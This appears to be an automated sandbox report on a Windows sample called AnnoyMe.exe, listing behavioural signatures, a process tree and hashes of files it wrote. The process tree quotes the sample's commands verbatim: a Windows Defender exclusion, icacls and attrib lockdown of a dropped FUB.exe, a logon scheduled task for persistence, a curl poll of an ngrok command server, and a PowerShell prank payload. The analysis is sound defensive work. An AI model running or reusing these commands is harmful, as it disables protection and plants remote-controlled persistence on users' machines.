Analysis

  • max time kernel
    97s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2024 16:03

General

  • Target

    https://file9.gofile.io/download/web/f2c9bc30-2dfc-400c-8d19-fff496fefd3c/AnnoyMe.exe

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://file9.gofile.io/download/web/f2c9bc30-2dfc-400c-8d19-fff496fefd3c/AnnoyMe.exe
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4560
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa803bcc40,0x7ffa803bcc4c,0x7ffa803bcc58
      2⤵
        PID:4112
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2
        2⤵
          PID:2952
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2144 /prefetch:3
          2⤵
            PID:4368
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:8
            2⤵
              PID:2032
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
              2⤵
                PID:3916
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
                2⤵
                  PID:4524
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3864 /prefetch:1
                  2⤵
                    PID:840
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3356,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3328 /prefetch:8
                    2⤵
                      PID:3092
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4812,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3372 /prefetch:1
                      2⤵
                        PID:3932
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4468,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:1
                        2⤵
                          PID:1496
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5280,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5276 /prefetch:8
                          2⤵
                            PID:3216
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5260,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5424 /prefetch:8
                            2⤵
                              PID:368
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5600,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5612 /prefetch:8
                              2⤵
                                PID:4056
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5644,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:8
                                2⤵
                                  PID:228
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5888,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5768 /prefetch:8
                                  2⤵
                                    PID:4404
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5196,i,9142261123224500072,6191114056068766708,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5328 /prefetch:8
                                    2⤵
                                      PID:3364
                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                    1⤵
                                      PID:3368
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                      1⤵
                                        PID:2820
                                      • C:\Windows\System32\rundll32.exe
                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        1⤵
                                          PID:1608
                                        • C:\Users\Admin\Desktop\AnnoyMe.exe
                                          "C:\Users\Admin\Desktop\AnnoyMe.exe"
                                          1⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3404
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F1C.tmp\1F1D.tmp\1F1E.bat C:\Users\Admin\Desktop\AnnoyMe.exe"
                                            2⤵
                                              PID:4848
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\FUB.exe"
                                                3⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2672
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r +s "C:\ProgramData\FUB.exe"
                                                3⤵
                                                • Views/modifies file attributes
                                                PID:1476
                                              • C:\Windows\system32\icacls.exe
                                                icacls "C:\ProgramData\FUB.exe" /setowner "SYSTEM"
                                                3⤵
                                                • Modifies file permissions
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1956
                                              • C:\Windows\system32\icacls.exe
                                                icacls "C:\ProgramData\FUB.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
                                                3⤵
                                                • Modifies file permissions
                                                PID:4948
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Create /TN FreeUseBish /TR "C:\ProgramData\FUB.exe" /RL highest /SC ONLOGON /F
                                                3⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3948
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /run /tn "FreeUseBish"
                                                3⤵
                                                  PID:3368
                                            • C:\ProgramData\FUB.exe
                                              C:\ProgramData\FUB.exe
                                              1⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              PID:4148
                                              • C:\Windows\system32\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\22E5.tmp\22E6.tmp\22E7.bat C:\ProgramData\FUB.exe"
                                                2⤵
                                                  PID:4140
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /T 30 /NOBREAK
                                                    3⤵
                                                    • Delays execution with timeout.exe
                                                    PID:1896
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command
                                                    3⤵
                                                      PID:1796
                                                      • C:\Windows\system32\curl.exe
                                                        curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command
                                                        4⤵
                                                          PID:2432
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -c "$tempMp3Path = [IO.Path]::Combine([IO.Path]::GetTempPath(), 'pokemon_theme.mp3'); Invoke-WebRequest -Uri 'https://www.televisiontunes.com/song/download/11549' -OutFile $tempMp3Path; Add-Type -AssemblyName presentationCore, System.Windows.Forms; $shell = New-Object -ComObject wscript.shell; $shell.SendKeys([char]173); Start-Sleep -Milliseconds 500; for ($i=0; $i -lt 50; $i++) { $shell.SendKeys([char]175) }; $wmp = New-Object -ComObject WMPlayer.OCX; $wmp.URL = $tempMp3Path; $wmp.controls.play(); $lyrics=@('SSB3YW5uYSBiZSB0aGUgdmVyeSBiZXN0','TGlrZSBubyBvbmUgZXZlciB3YXM=','VG8gY2F0Y2ggdGhlbSBpcyBteSByZWFsIHRlc3Q=','VG8gdHJhaW4gdGhlbSBpcyBteSBjYXVzZQ==','SSB3aWxsIHRyYXZlbCBhY3Jvc3MgdGhlIGxhbmQ=','U2VhcmNoaW5nIGZhciBhbmQgd2lkZQ==','VGVhY2ggUG9rZW1vbiB0byB1bmRlcnN0YW5k','VGhlIHBvd2VyIHRoYXQncyBpbnNpZGU=','UG9rZW1vbiE=','R290dGEgY2F0Y2ggJ2VtIGFsbC0t','SXQncyB5b3UgYW5kIG1l','SSBrbm93IGl0J3MgbXkgZGVzdGlueQ==','UG9rZW1vbiE=','T29vb2gsIHlvdSdyZSBteSBiZXN0IGZyaWVuZA==','SW4gYSB3b3JsZCB3ZSBtdXN0IGRlZmVuZA==','UG9rZW1vbiE=','R290dGEgY2F0Y2ggJ2VtIGFsbC0t','T3VyIGhlYXJ0cyBzbyB0cnVl','T3VyIGNvdXJhZ2Ugd2lsbCBwdWxsIHVzIHRocm91Z2g=','WW91IHRlYWNoIG1lIGFuZCBJJ2xsIHRlYWNoIHlvdQ==','UG9rZW1vbiE=','R290dGEgY2F0Y2ggJ2VtIGFsbCE='); $lyrics | % {[System.Windows.Forms.MessageBox]::Show([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))}"
                                                        3⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Enumerates connected drives
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3832
                                                  • C:\Windows\system32\taskmgr.exe
                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                    1⤵
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:3992
                                                  • C:\Users\Admin\Desktop\AnnoyMe.exe
                                                    "C:\Users\Admin\Desktop\AnnoyMe.exe"
                                                    1⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:368
                                                    • C:\Windows\system32\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2B3.tmp\A2B4.tmp\A2B5.bat C:\Users\Admin\Desktop\AnnoyMe.exe"
                                                      2⤵
                                                        PID:3368
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\FUB.exe"
                                                          3⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4012
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +r +s "C:\ProgramData\FUB.exe"
                                                          3⤵
                                                          • Views/modifies file attributes
                                                          PID:4960
                                                        • C:\Windows\system32\icacls.exe
                                                          icacls "C:\ProgramData\FUB.exe" /setowner "SYSTEM"
                                                          3⤵
                                                          • Modifies file permissions
                                                          PID:3940
                                                        • C:\Windows\system32\icacls.exe
                                                          icacls "C:\ProgramData\FUB.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
                                                          3⤵
                                                          • Modifies file permissions
                                                          PID:4968
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Create /TN FreeUseBish /TR "C:\ProgramData\FUB.exe" /RL highest /SC ONLOGON /F
                                                          3⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2352
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /run /tn "FreeUseBish"
                                                          3⤵
                                                            PID:2844
                                                      • C:\Windows\system32\AUDIODG.EXE
                                                        C:\Windows\system32\AUDIODG.EXE 0x50c 0x51c
                                                        1⤵
                                                          PID:4100
                                                        • C:\Windows\system32\taskmgr.exe
                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                          1⤵
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          PID:4032

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                          Filesize

                                                          64KB

                                                          MD5

                                                          d2fb266b97caff2086bf0fa74eddb6b2

                                                          SHA1

                                                          2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                          SHA256

                                                          b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                          SHA512

                                                          c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                        • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                          Filesize

                                                          4B

                                                          MD5

                                                          f49655f856acb8884cc0ace29216f511

                                                          SHA1

                                                          cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                          SHA256

                                                          7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                          SHA512

                                                          599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                        • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                          Filesize

                                                          944B

                                                          MD5

                                                          6bd369f7c74a28194c991ed1404da30f

                                                          SHA1

                                                          0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                          SHA256

                                                          878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                          SHA512

                                                          8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8a62ac1c-5503-41fe-9368-048f9f829ad9.tmp

                                                          Filesize

                                                          8KB

                                                          MD5

                                                          f22087bd6fd489ecebc57daa79741898

                                                          SHA1

                                                          bae994d541026956f82f003beb9de9334dcbcf8a

                                                          SHA256

                                                          9eda6ffdbd667d032b2b666e082df4e1b8e3fd2b98ce591702d59b9c275340c3

                                                          SHA512

                                                          3447c238ca60bfd84902f80dbbe214e121116ee635f17e290389d35be5893b73ed20fc7197577a235a3b50a555b9be817fe9156cb17ab0128c1bf4ebdaea98c6

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

                                                          Filesize

                                                          602KB

                                                          MD5

                                                          e2d95f65c0d9f77bab053c0177bce248

                                                          SHA1

                                                          ca22ae4f9911d5f390774df0318ad6e7d68d959f

                                                          SHA256

                                                          1c1c391c3ef9e2e82eb2410011b58a412d3c1f80965d60a4508b2b774beb8375

                                                          SHA512

                                                          8b620a8aa1935cd77060ee1b23e3fb391b144095609c6bbdce46ffeb1d2cc1fcebc927bbccf2ea0ccdef0afc5bc6986454829504cfe6856b4bd90ada4efe78a9

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                          Filesize

                                                          336B

                                                          MD5

                                                          294ded9b787a570a53f48d1622019190

                                                          SHA1

                                                          4c0a6ab79533a6388f531aee5ebbb1f022c017be

                                                          SHA256

                                                          2c446e8604d254720f82034dcf12b75c5c8de07e00c79f6ed45dde8247653cbe

                                                          SHA512

                                                          6b90c11e5aa67fb74fbdbc32fc1cb03556aeef15f92d1df6fc4824c65215322d45fe01ceec7bc8cd147221d39511db009d52252297327abb6ec71cef5e56fac1

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                          Filesize

                                                          4KB

                                                          MD5

                                                          ec1fee94f42ed2c69f4d4348ae06294e

                                                          SHA1

                                                          cfff95a48e03609728858751fc6a41d6cb8f6e51

                                                          SHA256

                                                          53bbf32592ce3c08781eb6aa3f4c3f168db3ce90a4136c57882492c647f89121

                                                          SHA512

                                                          526cc5f1b33342d4e9bad9a448dcba37c324dd9571eb2e1fc4c9e45c1c85f7c97eccf75f9034787b6fd8e83a962805fd60283bbc5a9688065701ba35485e5fb9

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                          Filesize

                                                          2B

                                                          MD5

                                                          d751713988987e9331980363e24189ce

                                                          SHA1

                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                          SHA256

                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                          SHA512

                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                          Filesize

                                                          856B

                                                          MD5

                                                          cefb27609639a33a4920da6ce43e196e

                                                          SHA1

                                                          559508cd65e5aebb613e40fb0b0445c1df96925f

                                                          SHA256

                                                          5461e81b7f3889191d7ad80849d83a8470e5fa7a09a4c3841547ae7370c24c8b

                                                          SHA512

                                                          bc85d47a63831fec1a2843f976259120553955868e4ac04a50f7585a35fdee15f476cf1d8a498a257fa394be61e40ec4dc9de3a1c9e704b8dbb91ff38217c3a5

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          7dc21be317d166e5b4cccd4cafc50fae

                                                          SHA1

                                                          86bdb301c7b13e7524804d5ae76fca161668bc86

                                                          SHA256

                                                          8f2ec94b3e1e45382ce599e62593a6cfc6be30be78829de3231c2de231c2dd37

                                                          SHA512

                                                          4c54e87c222ea688b42e80ad8756fc39d0450ba5a7c1996c4f283b1ed201a7d0b3f3a9231e3dfc717c4cb9c8b72f9273d618df1a15d8b812423fcdf1eee4f1ff

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                          Filesize

                                                          8KB

                                                          MD5

                                                          d1b2e10000fb76ba9a4818797ee87302

                                                          SHA1

                                                          acd5447bfac81fb1903fa26b214c68089e30fad8

                                                          SHA256

                                                          23793dff0fe8c11ed40de84606c770759b65b8662db5727615da8edd48952fa1

                                                          SHA512

                                                          71c8995fd7f3924909d42d5be9868b288c46d21fe2b0328136a3e36de3271f73c6423430fa5ee1ef1b8d0bb9c9224e12f70cd798e114abf37b9dad49b6bbe3a6

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          5fe7e6d8c03d89bfc7f78637c3421923

                                                          SHA1

                                                          036ef734a2425e7e6533a5585d206eeffadbb8e4

                                                          SHA256

                                                          862c7c45805331e5e32dfcf56cbe4325222675d329e6a9fa66a3f3ed7b89d7ec

                                                          SHA512

                                                          a86e9877c87b5d8806ac52d89485e8d32ef3370cadeaa071c0bd9eef90d35fad215e78831d18798a9a0cb847c1ceb52e17b93ec5e23cd7ebf9fbdb7fdb51bb31

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          2ab2292d9759b7cd32dbcdcdfe3df7ab

                                                          SHA1

                                                          5c05067b7ab657cf845351c3806608f18f824d70

                                                          SHA256

                                                          95e57c66699462c8393f40c2f490cbb259f9a381be443d52b2badbb1096b0678

                                                          SHA512

                                                          0715699ffc26947468c4c6fba45627b1f8be363e01d7f7acbe2d2a3ad6ff3b76f86f1b68f54cdfa12970ac04c880c4a3359394a3ed749e99d0cd017b3bf1fa75

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          bafddd644f21d63e733151d4f2d0ed7c

                                                          SHA1

                                                          3afede5c5289cba1287d1c6e32132dbda7d16ef1

                                                          SHA256

                                                          69d494394d4df7960dfe7623a1217d3834162f0450c4c7e272eaee5beddc878d

                                                          SHA512

                                                          372048a1e54a70d9fcbcccb1ef13406a52f5f54ab466b1d1264a1332a93785660eb7e25675f757dd32aea7538f7fe486c1569b15887d4c2f3a64e681f035097e

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                          Filesize

                                                          116KB

                                                          MD5

                                                          560b7ff88a6abc060a9d3018fec226b1

                                                          SHA1

                                                          0d8307b9847567c2a230e5c3b919ea50a8df3471

                                                          SHA256

                                                          adebce92e8723c04fcad87b6b74d3a04022cfc3cfa9487d523298a7dd1c1dca5

                                                          SHA512

                                                          41d36eb9ba5710f8c37ae215c9942ce2007a82db694e37632b388258952a80160352db030e85f3e0d1d7cac1e9f1aa8a299a2bd99172240464c3ac437302fd0e

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                          Filesize

                                                          116KB

                                                          MD5

                                                          5487c4d45542fe64b8e34160d3f16550

                                                          SHA1

                                                          0c9f7ff99e7d0d8532ff595a0e629b3f048de4bb

                                                          SHA256

                                                          b9bcf26a958735c3fe1aff70d38fd0e4ae62704f2679b4fd3e20c3912184fd91

                                                          SHA512

                                                          2536452f5bf7d7e4d6f4b05405834c252287eaedf751dc808214ba26031c121436a52a255e41ffc41f163159fe703187d6a3451a2ca918ba3435354db5278d44

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                          SHA1

                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                          SHA256

                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                          SHA512

                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                          Filesize

                                                          64KB

                                                          MD5

                                                          987a07b978cfe12e4ce45e513ef86619

                                                          SHA1

                                                          22eec9a9b2e83ad33bedc59e3205f86590b7d40c

                                                          SHA256

                                                          f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8

                                                          SHA512

                                                          39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          7050d5ae8acfbe560fa11073fef8185d

                                                          SHA1

                                                          5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                          SHA256

                                                          cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                          SHA512

                                                          a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

